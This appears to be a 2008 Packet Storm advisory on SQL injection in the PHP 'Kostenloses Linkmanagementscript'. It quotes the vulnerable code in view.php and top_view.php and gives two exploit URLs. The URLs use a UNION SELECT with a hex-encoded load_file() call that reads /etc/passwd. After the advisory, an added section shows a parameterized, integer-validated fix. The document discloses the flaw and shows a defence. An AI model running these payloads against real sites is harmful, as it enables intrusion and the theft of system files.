kostenloses-sql.txt

2008-05-15T00:00:00
ID PACKETSTORM:66413
Type packetstorm
Reporter hadihadi
Modified 2008-05-15T00:00:00

Description

                                        
                                            ` #######################################################################################  
# #  
# ...::::Kostenloses Linkmanagementscript SQL Injection Vulnerabilities ::::... #   
#######################################################################################  
  
Virangar Security Team  
  
www.virangar.net  
  
--------  
Discovered By :virangar security team(hadihadi)  
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-----  
  
-------vuln codes in:-----------  
top_view.php:  
line 3:$id = $_GET['id'];  
..  
..  
line 19:$voting_page_command_sql = "SELECT votings, worth FROM ".$tab_links." WHERE id = '".$id."'";  
*********  
view.php:  
line 8:$id = $_GET['id'];  
line 9:$view_page_command_sql = "SELECT url, hits FROM ".$tab_links." WHERE id = '".$id."'";  
---  
exploits:  
http://site.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*  
http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*  
---  
young iranian h4ck3rz  
`
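
Added example (not part of the original advisory and not the script's own code): a hardened form of the lookups in view.php and top_view.php, where the id is validated as an integer and passed as a bound parameter instead of being concatenated into the query. The function name fetch_link, the table name links, the sample row and the in-memory SQLite connection standing in for the script's MySQL connection are all assumptions made for illustration.

```php
<?php
// Added example: hardened lookup for the queries shown in the advisory.
// Assumptions: fetch_link() is a hypothetical helper; PDO with in-memory
// SQLite stands in for MySQL; table name and row are constructed samples.

function fetch_link(PDO $db, string $table, $rawId, array $columns): ?array
{
    // Table and column names cannot be bound as parameters, so allowlist them.
    $allowedTables  = ['links'];
    $allowedColumns = ['url', 'hits', 'votings', 'worth'];
    if ($columns === []
        || !in_array($table, $allowedTables, true)
        || array_diff($columns, $allowedColumns) !== []) {
        throw new InvalidArgumentException('unexpected identifier');
    }

    // id is a numeric key: reject anything that is not a positive integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The value travels as a bound parameter, never as part of the SQL text.
    $sql  = 'SELECT ' . implode(', ', $columns) . ' FROM ' . $table . ' WHERE id = :id';
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, url TEXT, hits INTEGER, votings INTEGER, worth INTEGER)');
$db->exec("INSERT INTO links VALUES (1, 'http://example.com/', 10, 3, 12)");

// A well-formed id reaches the database; inputs containing quotes or SQL
// keywords fail integer validation before any query is prepared.
var_dump(fetch_link($db, 'links', '1', ['url', 'hits']));
var_dump(fetch_link($db, 'links', "1' union select 1,2", ['url', 'hits']));
var_dump(fetch_link($db, 'links', '1 OR 1=1', ['votings', 'worth']));
```

The payloads in the advisory depend on load_file(), which MySQL only permits for accounts holding the FILE privilege, so the script's database account should be created without it.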